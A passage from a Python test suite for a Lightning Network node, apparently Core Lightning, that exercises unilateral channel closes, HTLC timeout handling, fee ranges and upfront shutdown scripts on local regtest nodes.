l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by IGNORING_TINY_PAYMENT .* after 6 blocks')
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('IGNORING_TINY_PAYMENT',
'THEIR_UNILATERAL/OUR_HTLC')
l1.daemon.wait_for_log('Ignoring output .*: THEIR_UNILATERAL/OUR_HTLC')
# 100 deep and l2 forgets.
bitcoind.generate_block(93)
sync_blockheight(bitcoind, [l1, l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# l1 does not wait for ignored payment.
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
# Graph of coin_move events we expect
expected_1 = {
'0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
'A': [('wallet', ['deposit'], None, None), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'B': [('wallet', ['channel_close'], None, None), ('cid1', ['htlc_timeout'], ['ignored'], 'C')],
'C': [('wallet', ['deposit'], None, None)],
}
expected_2 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('external', ['to_them'], None, None), ('external', ['htlc_timeout'], None, None)],
}
if anchor_expected():
expected_1['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('external', ['anchor'], None, None))
expected_1['B'].append(('wallet', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
tags = check_utxos_channel(l1, [channel_id], expected_1)
check_utxos_channel(l2, [channel_id], expected_2, tags)
@pytest.mark.developer("needs DEVELOPER=1 for dev_fail")
def test_onchain_different_fees(node_factory, bitcoind, executor):
"""Onchain handling when we've had a range of fees"""
l1, l2 = node_factory.line_graph(2, fundchannel=True, fundamount=10**7,
opts={'may_reconnect': True})
l2.rpc.dev_ignore_htlcs(id=l1.info['id'], ignore=True)
p1 = executor.submit(l1.pay, l2, 1000000000)
l2.daemon.wait_for_log('htlc 0: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION')
l1.set_feerates((16000, 11000, 7500, 3750))
p2 = executor.submit(l1.pay, l2, 900000000)
l2.daemon.wait_for_log('htlc 1: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION')
# Restart with different feerate for second HTLC.
l1.set_feerates((5000, 5000, 5000, 3750))
l1.restart()
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')
p3 = executor.submit(l1.pay, l2, 800000000)
l2.daemon.wait_for_log('htlc 2: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION')
# Drop to chain
l1.rpc.dev_fail(l2.info['id'])
l1.wait_for_channel_onchain(l2.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Both sides should have correct feerate
assert l1.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 11000
}]
assert l2.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 11000
}]
bitcoind.generate_block(5)
# Three HTLCs, and one for the to-us output.
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 4)
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
with pytest.raises(Exception):
p1.result(10)
with pytest.raises(Exception):
p2.result(10)
with pytest.raises(Exception):
p3.result(10)
# Two more for HTLC timeout tx to be spent.
bitcoind.generate_block(2)
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 3)
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail_new_commit(node_factory, bitcoind, executor):
# Test case where we have two possible commits: it will use new one.
disconnects = ['-WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None},
feerates=(7500, 7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, new commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# OK, time out HTLC.
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
l2.daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
def setup_multihtlc_test(node_factory, bitcoind):
# l1 -> l2 -> l3 -> l4 -> l5 -> l6 -> l7
# l1 and l7 ignore and HTLCs they're sent.
# For each direction, we create these HTLCs with same payment_hash:
# 1 failed (CLTV1)
# 1 failed (CLTV2)
# 2 live (CLTV2)
# 1 live (CLTV3)
nodes = node_factory.line_graph(7, wait_for_announce=True,
opts={'dev-no-reconnect': None,
'may_reconnect': True})
# Balance by pushing half the funds.
b11 = nodes[-1].rpc.invoice(10**9 // 2, '1', 'balancer')['bolt11']
nodes[0].rpc.pay(b11)
nodes[0].rpc.dev_ignore_htlcs(id=nodes[1].info['id'], ignore=True)
nodes[-1].rpc.dev_ignore_htlcs(id=nodes[-2].info['id'], ignore=True)
preimage = "0" * 64
inv = nodes[0].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)
h = inv['payment_hash']
nodes[-1].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)['payment_hash']
# First, the failed attempts (paying wrong node). CLTV1
r = nodes[0].rpc.getroute(nodes[-2].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[0].rpc.waitsendpay(h)
r = nodes[-1].rpc.getroute(nodes[1].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[-1].rpc.waitsendpay(h)
# Now increment CLTV -> CLTV2
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
# Now, the live attempts with CLTV2 (blackholed by end nodes)
r = nodes[0].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
r = nodes[-1].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
# We send second HTLC from different node, since they refuse to send
# multiple with same hash.
r = nodes[1].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[1].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
r = nodes[-2].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-2].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
# Now increment CLTV -> CLTV3.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
r = nodes[2].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[2].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
r = nodes[-3].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-3].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
# Make sure HTLCs have reached the end.
nodes[0].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
nodes[-1].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
return h, nodes
@pytest.mark.developer("needs DEVELOPER=1 for dev_ignore_htlcs")
@pytest.mark.slow_test
def test_onchain_multihtlc_our_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode goes onchain with n+1 channel.
nodes[mid].rpc.dev_fail(nodes[mid + 1].info['id'])
nodes[mid].wait_for_channel_onchain(nodes[mid + 1].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
# TODO Remove our reliance on HTLCs failing on startup and the need for
# this plugin
nodes[0].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[-1].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
# After at depth 5, midnode will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# The three outgoing HTLCs time out at 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# And three more for us to consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Depth 3 to consider it settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 100 it's all done (we didn't bother waiting for mid+1's
# spends, so that might still be going)
bitcoind.generate_block(97)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@pytest.mark.developer("needs DEVELOPER=1 for dev_ignore_htlcs")
@pytest.mark.slow_test
def test_onchain_multihtlc_their_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode+1 goes onchain with midnode channel.
nodes[mid + 1].rpc.dev_fail(nodes[mid].info['id'])
nodes[mid + 1].wait_for_channel_onchain(nodes[mid].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
# TODO Remove our reliance on HTLCs failing on startup and the need for
# this plugin
nodes[0].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[-1].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
# At depth 5, midnode+1 will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET')
# The three outgoing HTLCs time out at depth 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are at depths 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 5, mid+1 can spend HTLC_TIMEOUT_TX output.
bitcoind.generate_block(1)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# At depth 100 they're all done.
bitcoind.generate_block(100)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
nodes[mid + 1].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail_htlc_in(node_factory, bitcoind, executor):
# Test case where we fail with unsettled incoming HTLC.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None},
feerates=(7500, 7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# l2 then gets preimage, uses it instead of ignoring
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1)
# OK, l1 sees l2 fulfill htlc.
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
bitcoind.generate_block(5)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(95)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(5)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail_htlc_out(node_factory, bitcoind, executor):
# Test case where we fail with unsettled outgoing HTLC.
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
l1 = node_factory.get_node(options={'dev-no-reconnect': None})
# Feerates identical so we don't get gratuitous commit to update them
l2 = node_factory.get_node(disconnect=disconnects,
feerates=(7500, 7500, 7500, 7500))
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l2.daemon.wait_for_log('Handed peer, entering loop')
l2.fundchannel(l1, 10**6)
# This will fail at l2's end.
t = executor.submit(l2.pay, l1, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_logs([
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX \\(.*\\) after 6 blocks',
'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks'
])
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
# l1 then gets preimage, uses it instead of ignoring
l1.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
'THEIR_UNILATERAL/THEIR_HTLC')
# l2 sees l1 fulfill tx.
bitcoind.generate_block(1)
l2.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
t.cancel()
# l2 can send OUR_DELAYED_RETURN_TO_WALLET after 3 more blocks.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# Now, 100 blocks they should be done.
bitcoind.generate_block(95)
sync_blockheight(bitcoind, [l1, l2])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(3)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2)
# The funding change should be confirmed and our only output
assert [o['status'] for o in l1.rpc.listfunds()['outputs']] == ['confirmed']
l1.pay(l2, 200000000)
# Make sure l2 has received sig with 0 htlcs!
l2.daemon.wait_for_log('Received commit_sig with 1 htlc sigs')
l2.daemon.wait_for_log('Received commit_sig with 0 htlc sigs')
# Make sure l1 has final revocation.
l1.daemon.wait_for_log('Sending commit_sig with 1 htlc sigs')
l1.daemon.wait_for_log('Sending commit_sig with 0 htlc sigs')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# We fail l2, so l1 will reconnect to it.
l2.rpc.dev_fail(l1.info['id'])
l2.daemon.wait_for_log('Failing due to dev-fail command')
l2.wait_for_channel_onchain(l1.info['id'])
assert l1.bitcoin.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(l1.bitcoin.rpc.getrawmempool(False))
# l2 will send out tx (l1 considers it a transient error)
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET (.*) after 5 blocks')
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
== ['ONCHAIN:Tracking their unilateral close',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'])
def check_billboard():
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
return (
len(billboard) == 2
and billboard[0] == 'ONCHAIN:Tracking our own unilateral close'
and re.fullmatch(r'ONCHAIN:.* outputs unresolved: in 4 blocks will spend DELAYED_OUTPUT_TO_US \(.*:.*\) using OUR_DELAYED_RETURN_TO_WALLET', billboard[1])
)
wait_for(check_billboard)
# Now, mine 4 blocks so it sends out the spending tx.
bitcoind.generate_block(4)
# onchaind notes to-local payment immediately.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
# Restart, should still be confirmed (fails: unwinding blocks erases
# the confirmation, and we don't re-make it).
l1.restart()
wait_for(lambda: (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']]))
# It should send the to-wallet tx.
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 100 after l1 sees tx, it should be done.
bitcoind.generate_block(95)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'] == [
'ONCHAIN:Tracking our own unilateral close',
'ONCHAIN:All outputs resolved: waiting 5 more blocks before forgetting channel'
])
# Now, 100 blocks l2 should be done.
bitcoind.generate_block(5)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
# Only l1 has a direct output since all of l2's outputs are respent (it
# failed). Also the output should now be listed as confirmed since we
# generated some more blocks.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
# Check that the all the addresses match what we generated ourselves:
for o in l1.rpc.listfunds()['outputs']:
txout = bitcoind.rpc.gettxout(o['txid'], o['output'])
addr = scriptpubkey_addr(txout['scriptPubKey'])
assert(addr == o['address'])
addr = l1.bitcoin.getnewaddress()
l1.rpc.withdraw(addr, "all")
@pytest.mark.developer("needs DEVELOPER=1")
def test_shutdown(node_factory):
# Fail, in that it will exit before cleanup.
l1 = node_factory.get_node(may_fail=True)
if not node_factory.valgrind:
leaks = l1.rpc.dev_memleak()['leaks']
if len(leaks):
raise Exception("Node {} has memory leaks: {}"
.format(l1.daemon.thor_dir, leaks))
l1.rpc.stop()
@flaky
@pytest.mark.developer("needs to set upfront_shutdown_script")
def test_option_upfront_shutdown_script(node_factory, bitcoind, executor):
# There's a workaround in channeld, that it treats incoming errors
# before both sides are locked in as warnings; this happens in
# this test, so l1 reports the error as a warning!
l1 = node_factory.get_node(start=False, allow_warning=True)
# Insist on upfront script we're not going to match.
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = "76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac"
l1.start()
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 1000000, False)
# This will block, as l12 will send an error but l2 will retry.
fut = executor.submit(l1.rpc.close, l2.info['id'])
# l2 will close unilaterally when it dislikes shutdown script.
l1.daemon.wait_for_log(r'scriptpubkey .* is not as agreed upfront \(76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac\)')
# Clear channel.
wait_for(lambda: len(bitcoind.rpc.getrawmempool()) != 0)
bitcoind.generate_block(1)
fut.result(TIMEOUT)
wait_for(lambda: [c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN'])
wait_for(lambda: [c['state'] for c in only_one(l2.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN'])
# Works when l2 closes channel, too.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 1000000, False)
l2.rpc.close(l1.info['id'])
# l2 will close unilaterally when it dislikes shutdown script.
l1.daemon.wait_for_log(r'scriptpubkey .* is not as agreed upfront \(76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac\)')
# Clear channel.
wait_for(lambda: len(bitcoind.rpc.getrawmempool()) != 0)
bitcoind.generate_block(1)
wait_for(lambda: [c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN', 'ONCHAIN'])
wait_for(lambda: [c['state'] for c in only_one(l2.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN', 'ONCHAIN'])
# Figure out what address it will try to use.
keyidx = int(l1.db_query("SELECT intval FROM vars WHERE name='bip32_max_index';")[0]['intval'])
# Expect 1 for change address, plus 1 for the funding address of the actual
# funding tx.
addr = l1.rpc.call('dev-listaddrs', [keyidx + 2])['addresses'][-1]
# the above used to be keyidx + 3, but that was when `fundchannel`
# used the `txprepare`-`txdiscard`-`txprepare` trick, which skipped
# one address in the discarded tx.
# Now we use PSBTs, which means we never discard and skip an address.
# Now, if we specify upfront and it's OK, all good.
l1.stop()
# We need to prepend the segwit version (0) and push opcode (14).
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = '0014' + addr['bech32_redeemscript']
l1.start()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 1000000)
l1.rpc.close(l2.info['id'])
wait_for(lambda: sorted([c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']]) == ['CLOSINGD_COMPLETE', 'ONCHAIN', 'ONCHAIN'])
@pytest.mark.developer("needs to set upfront_shutdown_script")
def test_invalid_upfront_shutdown_script(node_factory, bitcoind, executor):
l1, l2 = node_factory.line_graph(2, fundchannel=False)
l1 = node_factory.get_node(start=False, allow_warning=True)
# Insist on upfront script we're not going to match.
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = "76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac00"
